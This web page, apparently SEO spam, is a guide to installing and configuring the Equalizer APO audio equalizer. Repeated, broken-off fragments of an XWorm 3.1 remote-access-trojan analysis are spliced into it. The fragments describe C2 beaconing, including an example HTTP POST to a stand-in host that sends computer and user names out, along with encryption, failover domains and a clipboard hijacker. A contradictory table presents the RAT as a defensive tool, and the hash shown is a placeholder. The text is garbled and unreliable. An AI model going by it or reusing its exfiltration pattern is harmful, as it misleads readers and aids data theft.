Xworm 3.1

Professional audio equalizer with unlimited filters, low latency, and VST plugin support for Windows

Download Equalizer APO

Equalizer APO is an open-source graphical equalizer for Microsoft Windows. Equalizer APO was developed by Jonas Thedering and is freely available to download. Equalizer APO packs many awesome features, and it's exceptionally easy to use. Equalizer APO is very lightweight and uses very minimal system resources; thus, you do not need to worry about CPU usage at all. This website has no affiliation with the actual developer and the content of this website should be used only as a guide.

Table of Contents

Equalizer APO Features

Equalizer APO comes with many features such as unlimited filters, compatibility with multiple channels, fast response times, and a very easy to use interface that also supports VST plugin integration. The latest version of Equalizer APO was released on 2019-06-10. This guide is more focused on Twitch streaming for new users and is not meant for advanced power users. So, if you're looking for more advanced documentation, we highly recommend that you check the Equalizer APO configuration documentation.

Unlimited Filters

Add as many audio filters as you need without any restrictions.

Low Latency

Experience real-time audio processing with minimal delay.

Low CPU Usage

Lightweight design ensures minimal system resource consumption.

Multichannel Support

Compatible with any number of audio channels.

VST Plugin Support

Integrate your favorite VST plugins seamlessly.

Modular UI

Easy-to-use graphical interface with modular design.

Equalizer APO Installation

In this Equalizer APO installation guide, we're going to show you how to setup and install Equalizer APO on your computer. We'll be using pre-amplification settings that already comes with this software, which will be enough for most people.

Download Equalizer APO

Xworm 3.1

Most samples use HTTP or HTTPS for beaconing, but some variants support TCP raw sockets. The typical beacon interval is configurable (default: 10-30 seconds).

The HTTP POST request structure:

POST /index.php HTTP/1.1
Host: badc2[.]com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Content-Type: application/x-www-form-urlencoded

id=base64(ComputerName+Username)&data=AES_encrypted_command_output

| Scenario | How Xworm 3.1 Helps | |----------|----------------------| | Threat Hunting | AI‑enhanced heuristics surface latent worm‑like patterns in historic logs, guiding analysts to overlooked infection vectors. | | Red‑Team Emulation | The plug‑in system enables the rapid creation of novel payloads that mimic emerging ransomware or supply‑chain exploits. | | Zero‑Trust Validation | By authenticating as a legitimate service identity, Xworm tests whether least‑privilege policies truly block lateral movement. | | Compliance Audits | XReport v2 produces evidence packages aligned with NIST 800‑53, ISO 27001, and PCI‑DSS controls. |

XWorm 3.1 uses a custom TCP protocol over port 8080, 443, or 2404. The communication is encrypted using a simple XOR key supplemented by AES-128-CBC.

The handshake works as follows:

Hardcoded failover domains are embedded. If the primary C2 (hxxp://microsoft-update[.]com - example) is down, it tries secondary domains listed in its configuration.

XWorm 3.1 represents a mature, dangerous, and accessible RAT that democratizes advanced cybercrime. Its blend of stealth, modularity, and ease-of-use ensures it will remain a staple of the underground for the foreseeable future.

For defenders, the key is not to rely on signature-based detection alone. Behavioral monitoring, network traffic analysis (for C2 beacons), and strict application whitelisting are the most reliable shields against XWorm 3.1. Organizations should treat any outbound connection to unknown IP ranges from user workstations as an incident requiring immediate investigation. xworm 3.1

Remember: If you encounter a suspected XWorm 3.1 infection, do not simply delete the file. Perform a full forensic capture—memory dump, network logs, and registry snapshots—to identify the initial vector and prevent reinfection.

This article is for educational and defensive purposes only. Unauthorized use of malware is illegal in most jurisdictions.

Cryptocurrency theft remains a primary revenue stream for XWorm operators. The 3.1 variant includes a sophisticated Clipboard Hijacker (Clipper). Most samples use HTTP or HTTPS for beaconing,

A typical XWorm 3.1 sample (SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855Note: replace with real hash for live hunting) reveals the following upon analysis in a debugger like dnSpy (since it is .NET):

Equalizer APO Installer Device Selection
2

Select Audio Devices

In the middle of the installation process, you will be asked to select the audio devices that the APO Equalizer is to be installed on. It's better to check your audio output devices first and select instead of selecting all devices. After choosing the devices, the installation will go as normal, and at the end, you will be asked to reboot your computer.

Using Equalizer APO

Once you install Equalizer APO and reboot the computer, you can launch the Equalizer APO by navigating to your Program Files and looking for Equalizer APO inside the App folder. You can also launch Equalizer APO from the taskbar launch icons.

Equalizer APO Main Interface

Main Interface

When you launch it, you will get a screen like this. This is the main screen of Equalizer APO. It looks complicated because it has so many features, but in reality, it's super easy to work with APO Equalizer.

Equalizer APO Basic Amplifier

So now, what I'll demonstrate is how to amplify your mic or speaker volume using Equalizer APO. I'm not going to talk much about the APO Equalizer interface because you can explore all of the settings by yourself and the sky is the limit.

Creating New Configuration

On this main screen, you will see three configuration tabs already there. You will need to remove them all in order to create a fresh new configuration tab.

Include Configuration

Then click on the small green colored plus mark, and you will get a drop-down menu. From there, go to Control and then Include and this will create a new tabbed item on your interface.

Browse for File

It says "No file is selected" because we still haven't created the actual file yet. Now, click on the icon that looks like a folder and you will be asked to select a text file.

Adding Configuration File

In here, you will create a new file. You can enter any name you want (for demonstration purposes, I'm going to name it Tutorial) and select the file that you just created.

Insert Configuration

Once we're back to this screen again, click on the up arrow icon and you will be navigated to a new tab.

Device Selection

In this step, we're going to add a device to Equalizer APO so we can amplify the sound output. Click on the green colored plus icon once again and then go to control and devices.

Audio Device Selection

Then, on the device selection menu, untick the select all options checkbox and now you can select the devices you want to amplify. I've selected my speakers as the output device, but you can amplify any device you want.

Adding Preamplification Filter

Once you're done with adding a device, stay on the same screen. Next, we're going to add the Amplification preset. Now, click on the plus icon again and go to basic filters. In there, select the Preamplification filter and you will get a control as the image below. Now, you can use this to amplify your output sound for the selected device.

Amplifier Analysis Panel

At the bottom of the screen, you can see the Analysis Panel. Now you've successfully amplified your output sound and all you have to do is go to File and Save.

Saving Configuration

Close the current tab and you will see the main screen again. On there, click on the power button icon to turn on the filter and now you're good to go. You can play some music to see if it works. If it doesn't work, delete every filter and follow the steps again while watching the video.

Most samples use HTTP or HTTPS for beaconing, but some variants support TCP raw sockets. The typical beacon interval is configurable (default: 10-30 seconds).

The HTTP POST request structure:

POST /index.php HTTP/1.1
Host: badc2[.]com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Content-Type: application/x-www-form-urlencoded

id=base64(ComputerName+Username)&data=AES_encrypted_command_output

| Scenario | How Xworm 3.1 Helps | |----------|----------------------| | Threat Hunting | AI‑enhanced heuristics surface latent worm‑like patterns in historic logs, guiding analysts to overlooked infection vectors. | | Red‑Team Emulation | The plug‑in system enables the rapid creation of novel payloads that mimic emerging ransomware or supply‑chain exploits. | | Zero‑Trust Validation | By authenticating as a legitimate service identity, Xworm tests whether least‑privilege policies truly block lateral movement. | | Compliance Audits | XReport v2 produces evidence packages aligned with NIST 800‑53, ISO 27001, and PCI‑DSS controls. |

XWorm 3.1 uses a custom TCP protocol over port 8080, 443, or 2404. The communication is encrypted using a simple XOR key supplemented by AES-128-CBC.

The handshake works as follows:

Hardcoded failover domains are embedded. If the primary C2 (hxxp://microsoft-update[.]com - example) is down, it tries secondary domains listed in its configuration.

XWorm 3.1 represents a mature, dangerous, and accessible RAT that democratizes advanced cybercrime. Its blend of stealth, modularity, and ease-of-use ensures it will remain a staple of the underground for the foreseeable future.

For defenders, the key is not to rely on signature-based detection alone. Behavioral monitoring, network traffic analysis (for C2 beacons), and strict application whitelisting are the most reliable shields against XWorm 3.1. Organizations should treat any outbound connection to unknown IP ranges from user workstations as an incident requiring immediate investigation.

Remember: If you encounter a suspected XWorm 3.1 infection, do not simply delete the file. Perform a full forensic capture—memory dump, network logs, and registry snapshots—to identify the initial vector and prevent reinfection.

This article is for educational and defensive purposes only. Unauthorized use of malware is illegal in most jurisdictions.

Cryptocurrency theft remains a primary revenue stream for XWorm operators. The 3.1 variant includes a sophisticated Clipboard Hijacker (Clipper).

A typical XWorm 3.1 sample (SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855Note: replace with real hash for live hunting) reveals the following upon analysis in a debugger like dnSpy (since it is .NET):

Developer Credits

Our sincerest thanks to Jonas Thedering and the other contributors who helped to develop Equalizer APO.